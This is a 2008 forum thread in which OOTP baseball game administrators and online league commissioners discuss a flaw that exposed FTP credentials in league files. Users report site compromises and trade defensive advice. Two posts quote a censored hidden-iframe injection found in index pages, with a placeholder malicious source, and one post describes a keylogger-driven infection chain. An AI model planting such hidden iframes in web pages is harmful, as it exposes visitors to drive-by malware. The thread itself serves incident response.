|
||||
|
|
Earlier versions of OOTP: Commissioner's Corner Want to run an online league? Want to learn about the 'ins' and 'outs' of being a commish? This is the place! |
|
Thread Tools |
12-04-2008, 07:11 AM | #1 |
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
|
OOTP Online League Security Problem
Attention, online league commissioners! A security issue has been discovered in the online league dat files. The dat files contain the league server's FTP access information and if a hacker finds the username and password he could easily access your web space and do all kind of malicious things.
We will release a patched version very soon where the FTP information contained in the dat files is encrypted. It's currently in beta testing. However, you know that each encryption can be hacked, so we strongly suggest that you hide your league files! Only GMs should have access to the league files. There should be no (public) link to the league file anywhere on your web space. That's easy to do and it will keep away the evildoers. The perfect solution for the league file problem would be an extra subdomain on your web space where PHP/CGI/Perl/ASP is turned OFF and which has an extra FTP account that can only access that sub domain folder. Please, all commissioners, do the following ASAP: --- Change the FTP password of the web site which the GMs used for the online leagues NOW (i.e. the password which has been entered in OOTP). The password must be replaced with another one IMMEDIATELY! If you cannot do that or if you don't know how to do that, you have to ask the admin of the web server, i.e. your ISP (Internet Service Provider) who hosts your web space. --- Move the league file to a different place on your web server where NOBODY CAN FIND IT. Only the GMs may know the address of the league file! Nobody else should be able to find it. You could just rename the league file or move it to another folder. In OOTP 2007/8/9 there is an option to set the name of the league file. Just set it to for example myLeague_ahsfkas89df.tar.gz and nobody will find it except your GMs who will get the link to the file from you. --- Remove the link to the league file from your homepage! Many online leagues publish the link on their web page for convenience, but you should no longer do that! --- Message board software and CMS (Content Management System like Joomla) software used for the online league web sites should be updated whenever updates are available. Hackers find new security holes in that kind of software frequently, simply because they have the source code of the software. We apologise for any inconvenience!! Please also have a look at these threads: http://www.ootpdevelopments.com/boar...e-leagues.html http://www.ootpdevelopments.com/boar...ty-notice.html |
12-04-2008, 09:05 PM | #2 |
Minors (Double A)
Join Date: Nov 2002
Location: Northern Virginia
Posts: 164
|
Can we get a confirmation as to whether this affects OOTP 8, since a large % of leagues are still on this version?
__________________
Current Leagues: (All years in "game" years) NOBL - Boston Red Sox (2002-present) NOBL - Commish (2006 - present) TTWB - Farmingdale Frunkus (2011 - present) My OOTP graveyard: LLM - Yucatan Leones (2012 - folded) CPL - Detroit Tigers (2011 - folded) FHBL -Cincinnati Reds (2006 - folded) Maverick Baseball - Boston Red Sox (2005 - folded) BPLA - Portland (2004: folded) |
12-04-2008, 09:30 PM | #3 |
All Star Starter
Join Date: May 2006
Posts: 1,404
|
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
__________________
Commish of the Home Nations Baseball Association Commish of the Baseball Association League Commish of the League of WAR Commish of the On-Line Dynasty League SIMBL2 - Westbury Cannons Great Lakes Baseball - Toledo Neptunes World Baseball - Guantanamo Marines OMLB - Cincinnati Reds |
12-05-2008, 12:57 AM | #4 |
Hall Of Famer
Join Date: Nov 2004
Posts: 6,069
|
I just found this in the index.html from an OOTP 6 online league I host...
Code:
<html> <head> <title>OOTP 6 Generated Website</title> </head> <frameset rows="100,*" frameborder="0" framespacing="0" border="0"> <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html"> <frameset cols="100,*"> <frame name="menu" target="Hauptframe" src="menu.html"> <frame name="content" src="league.html"> </frameset> <noframes> <body><(SPACE HERE) ****** src="http://badsitehere" style="width: 0px; height: 0px; display: none"><(SPACE HERE) /******> <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht unterst・zt.</p> </body> </noframes> </frameset> </html>
__________________
Fidel Montoya Asahi2 Baseball ex-Commissioner(Historical League Since 2004) www.allsimbaseball.com (OOTP web hosting - Customized sites for online leagues - Sign up, Connect OOTP and Play!) Share Your Mods - Free, unlimited and easy to upload to share your Mods instantly(free site registration required) Last edited by f.montoya; 12-17-2008 at 07:17 AM. |
12-05-2008, 03:47 AM | #5 | ||
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
|
Quote:
Quote:
In OOTP 6.5 everything was encrypted, and obviously it has been hacked, too. We could improve the encryption, but it will also be hacked sooner or later. See, obviously somebody wrote some code to hack OOTP Online leagues. He has to find and download the league file, extract the FTP info, log in to the site and do his dirty job. Lots of work actually, and there are not as many online leagues of the web as for example vBulletin message boards or Joomla web sites, so I don't know why the evildoer does that. There is only one explanation: we have an enemy out there. He cracked the first encryption and he will also crack the next one. No, encryption is not the solution. We have to change the whole process, and until we did that, the commisioners can do it on their own: - hide the league files! Only your GMs may know where it is! - use an extra FTP account for the folder to which the league files are uploaded! - change your FTP password NOW! We are sorry that this happened. We will improve OOTP and we will change the online league upload/download process. But the GMs can simply change the process now by hiding the league file and that will do much more than improving the encryption. |
||
12-05-2008, 04:04 AM | #6 |
Developer OOTP
Join Date: Dec 2001
Location: Germany
Posts: 24,738
|
Andreas is right. Please follow his guidelines!
|
12-05-2008, 04:59 AM | #7 |
Global Moderator
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
|
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
|
12-05-2008, 05:19 AM | #8 |
Global Moderator
|
Correct, because the FTP details they have in their game will be wrong.
|
12-05-2008, 09:20 AM | #9 |
All Star Starter
Join Date: Jan 2007
Posts: 1,196
|
Am I right in assuming that version 9.2.7 should not be used and
we should wait for 9.2.9? I am getting an error when I switch from an Online League to a Solo League. ( UTILITY_FUNCTIONS::get_decrypted_string-invalid source string ) I assume this has to do with identifing the difference between an Online League and a Non Online League. Last edited by SMFXR01; 12-05-2008 at 09:54 AM. |
12-06-2008, 02:20 PM | #10 | |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Quote:
Second, while the ftp pw can certainly be obtained from the league file without much hassle, I doubt we are dealing with a cracker doing things manually here. Obviously, the ****** hack is appearing because the ftp pw is leaked, but is a program the one that is inserting them (into all those files named "index" or "main") via a trojan on the user side. And no matter what you do if the trojan isn't removed from the machine, because that sofware (MPack, most likely) cycles and runs non-stop. The trojan is sending the cracker the ftp pw; if you change it but don't erase the trojan, he gets the new pw and you get the ****** code again. He may have targeted OOTP leagues, but websites have been infected by the ****** in the thousands since 2007, from CBS to aunti Mildred's cooking forums. Usually, it goes like this: this bot signs up on the forums (maybe several times); uses a valid email account and writes down a website address in its profile. Joe Curious notices the new guy on board and clicks to check that website. This one, of course, is a malware site, and the moment Joe Curious gets there his firewall and web brownser are checked for security loopholes, and if he has them, the trojan is d/l'ed and installed automatically. The trojan is a keylogger that sends the cracker all sorts of pw, mainly ftp's. Thus, the moment you change the pw, he gets it. The ****** gets inserted in the code and redirects your page to the malware site, thus infecting those who have security loopholes (mostly everyone whose firewall does no block the redirection). Things to do here are: 1. Scan your machine for malware. Have in mind that the trojan may block the anti-malware, so you might want to online scan (trend micro, for example) and/or install the anti-malware (a-squared, malware bytes, etc.) on a pen drive and scan the pc from there and remove the trojan. 2. Once you have your machine cleaned, take a close look at all the files you have on your site, erasing those you don't recognize. 3. Change your main ftp pw. 4. Create a ftp user and pw with permission to access just the folder where OOTP exports are located. That's the one you have to type down within the game, not the main ftp id and pw. 5. Rename your "index" pages (at least, your frontpage) to a different name (yourleague.html, for example). 6. Authorize every new registration on your forums. 7. Get yourself a malware shield. 8. Make sure that your web brownser is not allowed to d/l anything automatically. 9. Pray that the trojan is not located on the server side, because then your best move is transferring your site to another one.
__________________
The Computer Baseball League Last edited by Treches; 12-06-2008 at 02:27 PM. |
|
12-06-2008, 03:14 PM | #11 |
All Star Reserve
Join Date: Feb 2007
Posts: 925
|
You may be right about it being a trojan, but if that's the case we all have the same trojan. I know of at least 6 sites that were hacked multiple times in the last month or so, using the same method, including my own site which was hacked 4 times. Regardless of how the guy is getting the info, he's getting it and is apparently going after multiple OOTP sites.
|
12-06-2008, 04:05 PM | #12 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
It's the same type of trojan and he/they is/are going after all kind of sites because he/they is/are getting paid by the hit. The ****** not only gets inserted in the code but also erases other cracker's iframes. Mpack goes by $800, so we are not dealing with kids fooling around here.
__________________
The Computer Baseball League |
12-20-2008, 08:59 PM | #13 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
Hey guys...
The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out. And today we were hacked. The Jamaica League was also hacked. This was inserted in both our forums index.php file and our wordpress index.php file: Code:
<****** src="evil site" style="width: 0px; height: 0px; display: none"></******>
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals Last edited by Chappy; 12-21-2008 at 01:44 PM. |
12-21-2008, 12:30 AM | #14 | |
Global Moderator
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
|
Quote:
Whatever it is, once correct it, you'll probably want to change the passwords and locations again. |
|
12-21-2008, 07:26 AM | #15 | ||
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Quote:
Quote:
__________________
The Computer Baseball League |
||
12-21-2008, 07:29 AM | #16 | |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
And read:
Quote:
__________________
The Computer Baseball League |
|
12-21-2008, 07:36 AM | #17 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
So...
Would changing all the info and running a couple of sims from an alternate PC be agood idea?
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals |
12-21-2008, 07:40 AM | #18 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
If you use an alternate PC you're safe if a) It's clean, and b) Has a fresh ftp password. In any case, I'd recommend you to focus on removing the keylogger trojan from whomever has it.
__________________
The Computer Baseball League |
12-21-2008, 07:42 AM | #19 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Also, remove the ****** link from your post.
__________________
The Computer Baseball League |
12-23-2008, 09:09 AM | #20 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
Treches,
Thanks for the replies. I appreciate the help... However, I'm convinced that their is not a keylogger trojan on my machine. I've swept it now with 3 different products (including the Trend Micro one you recommended) and found nothing.
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals |
Bookmarks |
|
|